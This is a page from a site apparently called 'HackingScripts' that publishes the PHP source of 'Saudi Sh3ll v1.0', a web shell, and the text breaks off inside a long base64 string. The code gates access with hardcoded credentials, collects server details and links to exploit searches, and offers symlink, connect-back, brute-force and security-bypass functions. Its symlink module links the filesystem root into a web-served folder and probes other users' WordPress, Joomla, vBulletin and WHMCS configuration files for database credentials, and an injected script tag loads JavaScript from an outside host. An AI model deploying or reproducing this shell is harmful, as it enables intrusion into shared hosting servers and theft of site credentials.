HackingScripts

Hack Scripts for everybody

Saudi Sh3ll v1.0 Script

01 Mar 2014

Saudi Sh3ll v1.0, by al-swisre

Saudi Sh3ll v1.0 Source Code

   1 <?
   2 ob_start();
   3 ?>
   4 
   5 <?php
   6 
   7 ###
   8 ###
   9 ###
  10 ###
  11 ###
  12 ###
  13 ###
  14 ###
  15 ###
  16 ###
  17 ###
  18 ###
  19 ###
  20 ###
  21 ###
  22 ###
  23 ###
  24 ###
  25 ###
  26 ###\
  27 #                                        #
  28 #            Saudi Sh3ll v1.0            #
  29 #                                        #
  30 #             by al-swisre               #
  31 #                                        #
  32 
  33 ###
  34 ###
  35 ###
  36 ###
  37 ###
  38 ###
  39 ###
  40 ###
  41 ###
  42 ###
  43 ###
  44 ###
  45 ###
  46 ###
  47 ###
  48 ###
  49 ###
  50 ###
  51 ###
  52 ###/
  53 
  54 
  55 $auth = 1;
  56 $name='ec371748dc2da624b35a4f8f685dd122'; // Saudi
  57 $pass='ec371748dc2da624b35a4f8f685dd122'; // Saudi
  58 if($auth == 1) {
  59 if (!isset($_SERVER['PHP_AUTH_USER']) || md5($_SERVER['PHP_AUTH_USER'])!==$name || md5($_SERVER['PHP_AUTH_PW'])!==$pass)
  60    {
  61    header('WWW-Authenticate: Basic realm="Saudi Sh3ll v1.0"');
  62    header('HTTP/1.0 401 Unauthorized');
  63    exit("<b></b>");
  64    }
  65 }
  66 ?>
  67 
  68 
  69 <?
  70 
  71 
  72 
  73 
  74 
  75 
  76 @set_time_limit(0);
  77 @error_reporting(0);
  78 
  79 
  80 if ($_GET['sws']== 'phpinfo')
  81 {
  82 
  83 echo @phpinfo();
  84 
  85 exit;
  86 
  87 }
  88 
  89 
  90 
  91 echo '
  92 
  93 
  94 <title>'.$_SERVER['HTTP_HOST'].' ~ Saudi Sh3ll</title>
  95 <meta http-equiv="content=type"  content="text/html; charset=utf-8" />
  96 
  97 
  98 
  99 
 100 
 101 <style type="text/css">
 102   html,body {
 103      margin-top: 5px ;
 104      padding: 0;
 105      outline: 0;
 106 }
 107 
 108 
 109 body {
 110 
 111     direction: ltr;
 112     background-color: #000000;
 113     color: #CCCCCC;
 114     font-family: Tahoma, Arial, sans-serif;
 115     font-weight: bold;
 116     text-align: center ;
 117 }
 118 
 119 input,textarea,select{
 120 font-weight: bold;
 121 color: #FFFFFF;
 122 dashed #ffffff;
 123 border: 1px dotted #003300;
 124 background-color: black;
 125 padding: 3px
 126 }
 127 
 128 input:hover{
 129 box-shadow:0px 0px 4px #009900;
 130 
 131 }
 132 .cont a
 133 
 134 {
 135 
 136 
 137 text-decoration: none;
 138 color: #FFFFFF;
 139 
 140 
 141 
 142 }
 143 .hedr
 144 {
 145 font-size:32px;
 146 color: #009900;
 147 text-shadow: 0px 0px 4px #003300 ;
 148 
 149 
 150 
 151 }
 152 
 153 
 154 
 155 .td1{
 156 
 157 
 158     border: 1px dotted #022B04;
 159     padding: 8px;
 160     border-radius: 20px;
 161     text-shadow: 0px 0px 2px #003300;
 162     font-size: 10px;
 163     font-family: Tahoma;
 164     font-weight: bold;
 165 
 166 }
 167 
 168 .td1 tr{}
 169 
 170 .lol{
 171   text-align: left;
 172   float: left;
 173   background: #990000;
 174 }
 175 .nop{
 176 
 177 width: 180px;
 178 text-align: center;
 179 font-size: 15px;
 180 font-family:Tahoma;
 181 color: #003300;
 182 
 183 
 184 
 185 }
 186 .nop a{
 187   text-decoration: none;
 188   color: #003300 ;
 189   text-shadow: none;
 190   width: 80px;
 191   padding: 8px
 192 
 193 
 194 }
 195 .nop a:hover{
 196   color: #FFFFFF;
 197  box-shadow: 0px 0px 4px #006600 ;
 198 
 199 
 200 
 201   }
 202 a
 203 {
 204 text-decoration: none;
 205 color: #006600;
 206 
 207 }
 208 
 209 
 210 .tmp tr td:hover{
 211 
 212 box-shadow: 0px 0px 4px #EEEEEE;
 213 
 214 }
 215 .fot{
 216 
 217 font-family:Tahoma, Arial, sans-serif;
 218 
 219   font-size: 13pt;
 220 }
 221 
 222 .ir {
 223   color: #FF0000;
 224 }
 225 
 226 .cont
 227 {
 228 float:right;
 229 color: #FFFFFF;
 230 box-shadow: 0px 0px 4px #003300;
 231 font-size: 13px;
 232 padding: 8px
 233 
 234 }
 235 
 236 .cont a{
 237 
 238  text-decoration: none;
 239  color: #FFFFFF;
 240  font-family: Tahoma, Arial, sans-serif  ;
 241  font-size: 13px;
 242  text-shadow: 0px 0px 3px ;
 243 }
 244 
 245 .cont a:hover{
 246 
 247 
 248   color: #FF0000 ;
 249   text-shadow:0px 0px 3px #FF0000 ;
 250 
 251 
 252 }
 253 
 254 .cont3
 255 {
 256 color: #FFFFFF;
 257 font-size: 15px;
 258 padding: 8px
 259 
 260 }
 261 
 262 .cont3 a{
 263 
 264  text-decoration: none;
 265  color: #FFFFFF;
 266  font-family: Tahoma, Arial, sans-serif  ;
 267  font-size: 15px;
 268  text-shadow: 0px 0px 3px ;
 269 }
 270 
 271 .cont3 a:hover{
 272 
 273 
 274   color: #FF0000 ;
 275   text-shadow:0px 0px 3px #FF0000 ;
 276 
 277 
 278 }
 279 
 280 .tmp tr td{
 281 
 282 border: dotted 1px #003300;
 283 
 284 padding: 4px ;
 285 font-size: 14px;
 286 }
 287 
 288 .tmp tr td a {
 289   text-decoration: none;
 290 
 291 }
 292 .cmd
 293 {
 294 
 295 float:right;
 296 
 297 }
 298  .tbm{
 299  font-size: 14px;
 300 }
 301 
 302 .tbm tr td{
 303  border: dashed 1px #111111;
 304 
 305 }
 306 .hr{
 307 
 308 border: dotted 1px #003300;
 309 padding: 5px ;
 310 font-size: 13px;
 311 color: white ;
 312 text-shadow: 0px 0px 3px ;
 313 }
 314 
 315 .hr2{
 316 
 317 border: dotted 1px #003300;
 318 padding: 5px ;
 319 font-size: 13px;
 320 color: red ;
 321 text-shadow: 0px 0px 3px ;
 322 }
 323 
 324 .t3p{
 325 width: 100%;
 326 
 327 }
 328 
 329 .t3p{margin-left: 45px ;}
 330 
 331 .t33p{margin-left: 45px ;}
 332 
 333 
 334 .t3p tr td{
 335 
 336 border:  solid 1px #002F00;
 337 padding: 2px ;
 338 font-size: 13px;
 339 text-align: center ;
 340 font-weight: bold;
 341 margin-left: 20px ;
 342 
 343 }
 344 .t3p tr td:hover{
 345 
 346 box-shadow: 0px 0px 4px #009900;
 347 
 348 }
 349 
 350 
 351 .info {margin-left: 100px ; }
 352 
 353 .info tr td
 354 {
 355 
 356 border:  solid 1px #002F00;
 357 padding: 5px ;
 358 font-size: 13px;
 359 text-align: center ;
 360 font-weight: bold;
 361 
 362 
 363 }
 364 .conn{width: 70%;}
 365 
 366 .conn tr td{
 367 border: 1px dashed #003300;
 368 padding: 5px ;
 369 font-size: 13px;
 370 text-align: center ;
 371 font-weight: bold;
 372 
 373 }
 374 
 375 
 376 .lol a{
 377 
 378 font-size: 10px;
 379 
 380 }
 381 
 382 .d0n{
 383 width: 90%;
 384 border-top:  solid 1px #003300;
 385 
 386 }
 387 .d0n tr td{
 388 font-weight: bold;
 389 color: #FFFFFF;
 390  font-family: Tahoma, Arial, sans-serif  ;
 391  font-size: 13px;
 392  margin-left: 110px ;
 393 
 394 
 395 }
 396 .site
 397 {
 398 
 399 font-weight: bold;
 400 width: 50%;
 401 box-shadow: 0px 0px 2px #003300;
 402 
 403 
 404 }
 405 
 406 .ab
 407 {
 408 box-shadow: 0px 0px 6px #444444;
 409 width: 70%;
 410 padding: 10px ;
 411 
 412 }
 413 
 414 .ab tr td
 415 {
 416 text-align: center ;
 417 font-weight: bold;
 418  font-family: Tahoma, Arial, sans-serif  ;
 419   font-size: 13px;
 420  color: white;
 421   text-shadow: 0px 0px 2px white ;
 422 
 423 
 424 }
 425 .ab tr td b
 426 {
 427 color:red ;
 428 text-shadow: 0px 0px 2px red ;
 429 }
 430 .ab tr td a
 431 {
 432  color: white;
 433   text-shadow: 0px 0px 2px white ;
 434 
 435 }
 436 .ab tr td a:hover
 437 {
 438 color:#006600 ;
 439 text-shadow: none ;
 440 }
 441 
 442 .bru
 443 {
 444 color: #FFFFFF;
 445 font-family: Tahoma, Arial, sans-serif  ;
 446 font-size: 14px;
 447 text-shadow: 0px 0px 3px #000000 ;
 448 
 449 }
 450 
 451 .foter
 452 {
 453 
 454 color: #003300;
 455  font-family: Tahoma, Arial, sans-serif  ;
 456  font-size: 11px;
 457  text-shadow: 0px 0px 3px #000000 ;
 458 
 459 
 460 }
 461 
 462 
 463 
 464 
 465 
 466 
 467 
 468 </style>
 469 
 470 ';
 471 
 472 echo '
 473 
 474 <table width="95%" cellspacing="0" cellpadding="0" class="tb1" >
 475 
 476           <td width="15%" valign="top" rowspan="2">
 477             <div class="hedr"> <img src="http://im11.gulfup.com/2012-02-03/1328267135241.png" align="left" alt="Saudi Shell" > </div>
 478              </td>
 479 
 480         <td height="100" align="left" class="td1"   >
 481 
 482 ';
 483 
 484 $pg = basename(__FILE__);
 485 
 486 echo "OS : <b><font color=green>";
 487 $safe_mode = @ini_get('safe_mode');
 488 $dir = @getcwd();
 489 $ip=$_SERVER['REMOTE_ADDR'];
 490 $ips=$_SERVER['SERVER_ADDR'];
 491 define('SWS','al-swisre');
 492 
 493 if ($os)
 494 {
 495 
 496 
 497 }
 498 else
 499 {
 500   $os = @php_uname();
 501   echo $os ;
 502 }
 503 echo "&nbsp;&nbsp;&nbsp;[ <a style='text-decoration: none; color: #003300; text-shadow: 2px 2px 7px #003300;   ' target='_blank' href='http://www.google.com.sa/search?hl=ar&safe=active&client=firefox-a&hs=9Xx&rls=org.mozilla%3Aar%3Aofficial&q=$os&oq=$os&aq=f&aqi=&aql=&gs_sm=e&gs_upl=5759106l5781953l0l5782411l1l1l0l0l0l0l0l0ll0l0'>Google</a> ]";
 504 echo "&nbsp;&nbsp;&nbsp;[ <a style='text-decoration: none; color: #003300; text-shadow: 2px 2px 7px #003300;   ' target='_blank' href='http://www.exploit-db.com/search/?action=search&filter_page=1&filter_description=$os&filter_exploit_text=&filter_author=&filter_platform=0&filter_type=0&filter_lang_id=0&filter_port=&filter_osvdb=&filter_cve='>exploit-db</a> ]";
 505 echo "</font><br /></b>";
 506 
 507 echo (($safe_mode)?("safe_mode &nbsp;: <b><font color=red>ON</font></b>"):("safe_mode: <b><font color=green>OFF</font></b>"));
 508 echo "<br />disable_functions : ";
 509 if(''==($df=@ini_get('disable_functions'))){echo "<font color=green>NONE</font></b>";}else{
 510 
 511 
 512 echo "<font color=red>$df</font></b>";
 513 <SCRIPT SRC=http://www.r57.gen.tr/yazciz/ciz.js></SCRIPT>
 514 }
 515 
 516 echo "<br />Server :&nbsp;<font color=green>".$_SERVER['SERVER_SOFTWARE']."</font><br>";
 517 
 518 echo "PHP version : <b><font color=green>".@phpversion()."</font></b><br />";
 519 
 520 
 521 echo "Id : <font color=green><b>"."user = ".@get_current_user()." | uid= ".@getmyuid()." | gid= ".@getmygid()."</font></b><br />";
 522 
 523 echo "Pwd : <font color=green><b>".$dir."&nbsp;&nbsp;".wsoPermsColor($dir)."</font></b>&nbsp;&nbsp;[ <a href='$pg'>Home</a> ]<br /><br /><br />";
 524 
 525 
 526 echo "Your ip :&nbsp;<font ><b><a style='text-decoration: none; color: #FF0000;' href='http://whatismyipaddress.com/ip/$ip' target='_blank' >$ip &nbsp;&nbsp;</a></font></b>
 527 
 528  | ip server :&nbsp;<a style='text-decoration: none; color: #FF0000;' href='http://whatismyipaddress.com/ip/$ips' target='_blank' >$ips</a></font></b>
 529 
 530 | &nbsp;<a style='text-decoration: none; color: #FF0000;' href='$pg?sws=site' target='_blank' >list site</a></font></b>
 531 | &nbsp;<a style='text-decoration: none; color: #FF0000;' href='?sws=phpinfo' target='_blank' >phpinfo</a></font></b> |";
 532 
 533 
 534 
 535 
 536 
 537 
 538 
 539 
 540 
 541  echo "
 542 <br />
 543 
 544 
 545 
 546 
 547 
 548 
 549 
 550 
 551         </tr>
 552         </table>
 553 
 554 <table cellspacing='0' cellpadding='0'  style=' margin:9px'>
 555 
 556     <tr>
 557           <td  rowspan='2' class='td1' valign='top' >
 558 
 559 
 560         <div class='nop'>
 561 
 562          <br /><a href='$pg' >File Manager</a> <br /> <br />
 563          <a href='$pg?sws=info' >More info</a> <br /><br />
 564          <a href='$pg?sws=ms' >Mysql Manager</a> <br /><br />
 565          <a href='$pg?sws=byp' >bypass Security</a> <br /><br />
 566          <a href='$pg?sws=sm' >Symlink</a> <br /><br />
 567          <a href='$pg?sws=con' >Connect Back</a> <br /><br />
 568          <a href='?sws=brt' >BruteForce</a> <br /><br />
 569          <a href='$pg?sws=ab' >About Por</a> <br />
 570 
 571 
 572 
 573         </div>
 574 
 575     ";
 576 
 577 
 578 
 579 
 580 
 581 echo '
 582 
 583 <td  height="444" width="82%"  align="center" valign="top">
 584 
 585 ';
 586 
 587 
 588 if(isset($_REQUEST['sws']))
 589 {
 590 
 591 switch ($_REQUEST['sws'])
 592 {
 593 
 594 
 595 ////////////////////////////////////////////////// Symlink //////////////////////////////////////
 596 
 597 case 'sm':
 598 
 599 $sws = 'al-swisre' ;
 600 
 601 $mk = @mkdir('sym',0777);
 602 
 603 
 604 
 605 $htcs  = "Options all \n DirectoryIndex Sux.html \n AddType text/plain .php \n AddHandler server-parsed .php \n  AddType text/plain .html \n AddHandler txt .html \n Require None \n Satisfy Any";
 606 $f =@fopen ('sym/.htaccess','w');
 607 
 608 
 609 @fwrite($f , $htcs);
 610 
 611 
 612 $sym = @symlink("/","sym/root");
 613 
 614 
 615 
 616 
 617 $pg = basename(__FILE__);
 618 
 619 
 620 
 621 echo '<div class="cont3">
 622 [ <a href="?sws=sm"> Symlink File </a>]
 623 
 624 [<a href="?sws=sm&sy=sym"> User & Domains & Symlink </a>]
 625 
 626 [<a href="?sws=sm&sy=sec"> Domains & Script </a>]
 627 
 628 [ <a href="?sws=sm&sy=pl">Make Symlink Perl</a>]
 629 </div><br /><br />'  ;
 630 
 631 ////////////////////////////////// file ////////////////////////
 632 $sws = 'al-swisre' ;
 633 
 634 if(isset($_REQUEST['sy']))
 635 {
 636 
 637 switch ($_REQUEST['sy'])
 638 {
 639 
 640 
 641 
 642 
 643 
 644 /// Domains + Scripts  ///
 645 
 646 case 'sec':
 647 
 648 
 649 $d00m = @file("/etc/named.conf");
 650 
 651 if(!$d00m)
 652 {
 653 die (" can't read /etc/named.conf");
 654 }
 655 else
 656 
 657 {
 658 echo "<div class='tmp'>
 659 <table align='center' width='40%'><td> Domains </td><td> Script </td>";
 660 foreach($d00m as $dom){
 661 
 662 if(eregi("zone",$dom)){
 663 
 664 preg_match_all('#zone "(.*)"#', $dom, $domsws);
 665 
 666 flush();
 667 
 668 if(strlen(trim($domsws[1][0])) > 2){
 669 
 670 $user = posix_getpwuid(@fileowner("/etc/valiases/".$domsws[1][0]));
 671 
 672 ///////////////////////////////////////////////////////////////////////////////////
 673 
 674 $wpl=$pageURL."/sym/root/home/".$user['name']."/public_html/wp-config.php";
 675 $wpp=@get_headers($wpl);
 676 $wp=$wpp[0];
 677 
 678 $wp2=$pageURL."/sym/root/home/".$user['name']."/public_html/blog/wp-config.php";
 679 $wpp2=@get_headers($wp2);
 680 $wp12=$wpp2[0];
 681 
 682 ///////////////////////////////
 683 
 684 $jo1=$pageURL."/sym/root/home/".$user['name']."/public_html/configuration.php";
 685 $joo=@get_headers($jo1);
 686 $jo=$joo[0];
 687 
 688 
 689 $jo2=$pageURL."/sym/root/home/".$user['name']."/public_html/joomla/configuration.php";
 690 $joo2=@get_headers($jo2);
 691 $jo12=$joo2[0];
 692 
 693 ////////////////////////////////
 694 
 695 $vb1=$pageURL."/sym/root/home/".$user['name']."/public_html/includes/config.php";
 696 $vbb=@get_headers($vb1);
 697 $vb=$vbb[0];
 698 
 699 $vb2=$pageURL."/sym/root/home/".$user['name']."/public_html/vb/includes/config.php";
 700 $vbb2=@get_headers($vb2);
 701 $vb12=$vbb2[0];
 702 
 703 $vb3=$pageURL."/sym/root/home/".$user['name']."/public_html/forum/includes/config.php";
 704 $vbb3=@get_headers($vb3);
 705 $vb13=$vbb3[0];
 706 
 707 /////////////////
 708 
 709 $wh1=$pageURL."/sym/root/home/".$user['name']."public_html/clients/configuration.php";
 710 $whh2=@get_headers($wh1);
 711 $wh=$whh2[0];
 712 
 713 $wh2=$pageURL."/sym/root/home/".$user['name']."/public_html/support/configuration.php";
 714 $whh2=@get_headers($wh2);
 715 $wh12=$whh2[0];
 716 
 717 $wh3=$pageURL."/sym/root/home/".$user['name']."/public_html/client/configuration.php";
 718 $whh3=@get_headers($wh3);
 719 $wh13=$whh3[0];
 720 
 721 $wh5=$pageURL."/sym/root/home/".$user['name']."/public_html/submitticket.php";
 722 $whh5=@get_headers($wh5);
 723 $wh15=$whh5[0];
 724 
 725 $wh4=$pageURL."/sym/root/home/".$user['name']."/public_html/client/configuration.php";
 726 $whh4=@get_headers($wh4);
 727 $wh14=$whh4[0];
 728 
 729 
 730 
 731 ////////////////////////////////////////////////////////////////////////////////
 732 
 733  ////////// WordPress ////////////
 734 
 735 $pos = strpos($wp, "200");
 736 $config="&nbsp;";
 737 
 738 if (strpos($wp, "200") == true )
 739 {
 740  $config="<a href='".$wpl."' target='_blank'>Wordpress</a>";
 741 }
 742 elseif (strpos($wp12, "200") == true)
 743 {
 744   $config="<a href='".$wp2."' target='_blank'>Wordpress</a>";
 745 }
 746 
 747 ///////////WHMCS////////
 748 
 749 elseif (strpos($jo, "200")  == true and strpos($wh15, "200")  == true )
 750 {
 751   $config=" <a href='".$wh5."' target='_blank'>WHMCS</a>";
 752 
 753 }
 754 elseif (strpos($wh12, "200")  == true)
 755 {
 756   $config =" <a href='".$wh2."' target='_blank'>WHMCS</a>";
 757 }
 758 
 759 elseif (strpos($wh13, "200")  == true)
 760 {
 761   $config =" <a href='".$wh3."' target='_blank'>WHMCS</a>";
 762 
 763 }
 764 
 765 ///////// Joomla to 4 ///////////
 766 
 767 elseif (strpos($jo, "200")  == true)
 768 {
 769   $config=" <a href='".$jo1."' target='_blank'>Joomla</a>";
 770 }
 771 
 772 elseif (strpos($jo12, "200")  == true)
 773 {
 774   $config=" <a href='".$jo2."' target='_blank'>Joomla</a>";
 775 }
 776 
 777 //////////vBulletin to 4 ///////////
 778 
 779 elseif (strpos($vb, "200")  == true)
 780 {
 781   $config=" <a href='".$vb1."' target='_blank'>vBulletin</a>";
 782 }
 783 
 784 elseif (strpos($vb12, "200")  == true)
 785 {
 786   $config=" <a href='".$vb2."' target='_blank'>vBulletin</a>";
 787 }
 788 
 789 elseif (strpos($vb13, "200")  == true)
 790 {
 791   $config=" <a href='".$vb3."' target='_blank'>vBulletin</a>";
 792 }
 793 
 794 else
 795 {
 796  continue;
 797 }
 798 
 799 /////////////////////////////////////////////////////////////////////////////////////
 800 
 801 
 802 
 803 $site = $user['name'] ;
 804 
 805 
 806 
 807 
 808 echo "<tr><td><a href=http://www.".$domsws[1][0]."/>".$domsws[1][0]."</a></td>
 809 <td>".$config."</td></tr>"; flush();
 810 exit;
 811 
 812 }
 813 }
 814 }
 815 }
 816 
 817 
 818 
 819 
 820 break;
 821 
 822 
 823 /// user + domine + symlink  ///
 824 
 825 case 'sym':
 826 
 827 $d00m = @file("/etc/named.conf");
 828 
 829 if(!$d00m)
 830 {
 831 die (" can't read /etc/named.conf");
 832 }
 833 else
 834 
 835 {
 836 echo "<div class='tmp'><table align='center' width='40%'><td>Domains</td><td>Users</td><td>symlink </td>";
 837 foreach($d00m as $dom){
 838 
 839 if(eregi("zone",$dom)){
 840 
 841 preg_match_all('#zone "(.*)"#', $dom, $domsws);
 842 
 843 flush();
 844 
 845 if(strlen(trim($domsws[1][0])) > 2){
 846 
 847 $user = posix_getpwuid(@fileowner("/etc/valiases/".$domsws[1][0]));
 848 
 849 
 850 
 851 $site = $user['name'] ;
 852 
 853 
 854 @symlink("/","sym/root");
 855 
 856 $site = $domsws[1][0];
 857 
 858 $ir = 'ir';
 859 
 860 $il = 'il';
 861 
 862 if (preg_match("/.^$ir/",$domsws[1][0]) or preg_match("/.^$il/",$domsws[1][0]) )
 863 {
 864 $site = "<div style=' color: #FF0000 ; text-shadow: 0px 0px 1px red; '>".$domsws[1][0]."</div>";
 865 }
 866 
 867 
 868 echo "
 869 <tr>
 870 
 871 <td>
 872 <div class='dom'><a target='_blank' href=http://www.".$domsws[1][0]."/>".$site." </a> </div>
 873 </td>
 874 
 875 
 876 <td>
 877 ".$user['name']."
 878 </td>
 879 
 880 
 881 
 882 
 883 
 884 
 885 <td>
 886 <a href='sym/root/home/".$user['name']."/public_html' target='_blank'>symlink </a>
 887 </td>
 888 
 889 
 890 </tr></div> ";
 891 
 892 
 893 flush();
 894 
 895 }
 896 }
 897 }
 898 }
 899 
 900 
 901 
 902 
 903 break;
 904 
 905 case 'pl':
 906 
 907 if (!is_dir('sa2')){
 908 
 909 $mk = @mkdir('sa2',0777);
 910 
 911 
 912 
 913 if (is_file('sa2/perl.pl'))
 914 {
 915 
 916 
 917 echo "<a href='sa2/perl.pl' target='_blank'>Symlink Perl</a>";
 918 
 919 
 920 @chmod('sa2/perl.pl',0755);
 921 
 922 
 923 
 924 
 925 }
 926 else
 927 {
 928 
 929 
 930 
 931 
 932 $f2 =@fopen ('sa2/perl.pl','w');
 933 
 934 
 935 $sml_perl = "IyEvdXNyL2Jpbi9wZXJsIC1JL2hvbWUvYWxqbm9mcWUvcHVibGljX2h0bWwvdHJhZmlxL2dvbmZpZy5wbA0KcHJpbnQgIkNvbnRlbnQtdHlwZTogdGV4dC9odG1sXG5cbiI7DQpwcmludCc8IURPQ1RZUEUgaHRtbCBQVUJMSUMgIi0vL1czQy8vRFREIFhIVE1MIDEuMCBUcmFuc2l0aW9uYWwvL0VOIiAiaHR0cDovL3d3dy53My5vcmcvVFIveGh0bWwxL0RURC94aHRtbDEtdHJhbnNpdGlvbmFsLmR0ZCI+DQo8aHRtbCB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMTk5OS94aHRtbCI+DQo8aGVhZD4NCjxtZXRhIGh0dHAtZXF1aXY9IkNvbnRlbnQtTGFuZ3VhZ2UiIGNvbnRlbnQ9ImVuLXVzIiAvPg0KPG1ldGEgaHR0cC1lcXVpdj0iQ29udGVudC1UeXBlIiBjb250ZW50PSJ0ZXh0L2h0bWw7IGNoYXJzZXQ9dXRmLTgiIC8+DQo8dGl0bGU+W35dIFBhaW4gU3ltbGluazwvdGl0bGU+DQo8c3R5bGUgdHlwZT0idGV4dC9jc3MiPg0KLm5ld1N0eWxlMSB7DQogZm9udC1mYW1pbHk6IFRhaG9tYTsNCiBmb250LXNpemU6IHgtc21hbGw7DQogZm9udC13ZWlnaHQ6IGJvbGQ7DQogY29sb3I6ICMwMEZGRkY7DQogIHRleHQtYWxpZ246IGNlbnRlcjsNCn0NCjwvc3R5bGU+DQo8L2hlYWQ+DQonOw0Kc3ViIGxpbHsNCiAgICAoJHVzZXIpID0gQF87DQokbXNyID0gcXh7cHdkfTsNCiRrb2xhPSRtc3IuIi8iLiR1c2VyOw0KJGtvbGE9fnMvXG4vL2c7DQpzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvdmIvaW5jbHVkZXMvY29uZmlnLnBocCcsJGtvbGEuJ35+dkJ1bGxldGluMS50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9pbmNsdWRlcy9jb25maWcucGhwJywka29sYS4nfn52QnVsbGV0aW4yLnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL2ZvcnVtL2luY2x1ZGVzL2NvbmZpZy5waHAnLCRrb2xhLid+fnZCdWxsZXRpbjMudHh0Jyk7DQpzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvY2MvaW5jbHVkZXMvY29uZmlnLnBocCcsJGtvbGEuJ35+dkJ1bGxldGluNC50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9jb25maWcucGhwJywka29sYS4nfn5QaHBiYjEudHh0Jyk7DQpzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvZm9ydW0vaW5jbHVkZXMvY29uZmlnLnBocCcsJGtvbGEuJ35+UGhwYmIyLnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL3dwLWNvbmZpZy5waHAnLCRrb2xhLid+fldvcmRwcmVzczEudHh0Jyk7DQpzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvYmxvZy93cC1jb25maWcucGhwJywka29sYS4nfn5Xb3JkcHJlc3MyLnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL2NvbmZpZ3VyYXRpb24ucGhwJywka29sYS4nfn5Kb29tbGExLnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL2Jsb2cvY29uZmlndXJhdGlvbi5waHAnLCRrb2xhLid+fkpvb21sYTIudHh0Jyk7DQpzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvam9vbWxhL2NvbmZpZ3VyYXRpb24ucGhwJywka29sYS4nfn5Kb29tbGEzLnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL3dobS9jb25maWd1cmF0aW9uLnBocCcsJGtvbGEuJ35+V2htMS50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC93aG1jL2NvbmZpZ3VyYXRpb24ucGhwJywka29sYS4nfn5XaG0yLnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL3N1cHBvcnQvY29uZmlndXJhdGlvbi5waHAnLCRrb2xhLid+fldobTMudHh0Jyk7DQpzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvY2xpZW50L2NvbmZpZ3VyYXRpb24ucGhwJywka29sYS4nfn5XaG00LnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL2JpbGxpbmdzL2NvbmZpZ3VyYXRpb24ucGhwJywka29sYS4nfn5XaG01LnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL2JpbGxpbmcvY29uZmlndXJhdGlvbi5waHAnLCRrb2xhLid+fldobTYudHh0Jyk7DQpzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvY2xpZW50cy9jb25maWd1cmF0aW9uLnBocCcsJGtvbGEuJ35+V2htNy50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC93aG1jcy9jb25maWd1cmF0aW9uLnBocCcsJGtvbGEuJ35+V2htOC50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9vcmRlci9jb25maWd1cmF0aW9uLnBocCcsJGtvbGEuJ35+V2htOS50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9hZG1pbi9jb25mLnBocCcsJGtvbGEuJ35+NS50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9hZG1pbi9jb25maWcucGhwJywka29sYS4nfn40LnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL2NvbmZfZ2xvYmFsLnBocCcsJGtvbGEuJ35+aW52aXNpby50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9pbmNsdWRlL2RiLnBocCcsJGtvbGEuJ35+Ny50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9jb25uZWN0LnBocCcsJGtvbGEuJ35+OC50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9ta19jb25mLnBocCcsJGtvbGEuJ35+bWstcG9ydGFsZTEudHh0Jyk7DQpzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvaW5jbHVkZS9jb25maWcucGhwJywka29sYS4nfn4xMi50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9zZXR0aW5ncy5waHAnLCRrb2xhLid+flNtZi50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9pbmNsdWRlcy9mdW5jdGlvbnMucGhwJywka29sYS4nfn5waHBiYjMudHh0Jyk7DQpzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvaW5jbHVkZS9kYi5waHAnLCRrb2xhLid+fmluZmluaXR5LnR4dCcpOw0KfQ0KaWYgKCRFTlZ7J1JFUVVFU1RfTUVUSE9EJ30gZXEgJ1BPU1QnKSB7DQogIHJlYWQoU1RESU4sICRidWZmZXIsICRFTlZ7J0NPTlRFTlRfTEVOR1RIJ30pOw0KfSBlbHNlIHsNCiAgJGJ1ZmZlciA9ICRFTlZ7J1FVRVJZX1NUUklORyd9Ow0KfQ0KQHBhaXJzID0gc3BsaXQoLyYvLCAkYnVmZmVyKTsNCmZvcmVhY2ggJHBhaXIgKEBwYWlycykgew0KICAoJG5hbWUsICR2YWx1ZSkgPSBzcGxpdCgvPS8